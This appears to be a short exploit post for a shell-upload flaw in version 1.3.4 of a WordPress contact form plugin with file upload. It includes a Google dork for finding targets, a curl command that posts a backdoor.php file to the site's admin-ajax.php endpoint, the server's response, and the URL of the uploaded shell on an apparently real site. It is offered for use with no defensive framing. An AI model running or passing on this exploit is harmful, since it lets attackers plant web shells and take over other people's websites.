Exploit WP N-Media Website Contact Form with File Upload 1.3.4 Shell Upload

Assalamuallaikum Wr.Wb
Backk ----

• #$idoarjo Getar | Stay calm and Hide our Skills
• #Author: Claudio Viviani
• #Dork: index of website-contact-form-with-file-upload 
• #Type: Php ,Uploadify
• #Tested: Linux BackBox 4.0 / curl 7.35.0
• #CMS:WordPress

Info : 

  

The "upload_file()" ajax function is affected from unrestircted file upload vulnerability

Poc :

curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F  "action=nm_webcontact_upload_file" http://site.co.li/wp-admin/admin-ajax.php

   

Response: {"status":"uploaded","filename":"MrXerovhincs.php"}

Shell Location : 

http://conntresso.co.li/wp-content/uploads/contact_files/MrXerovhincs.php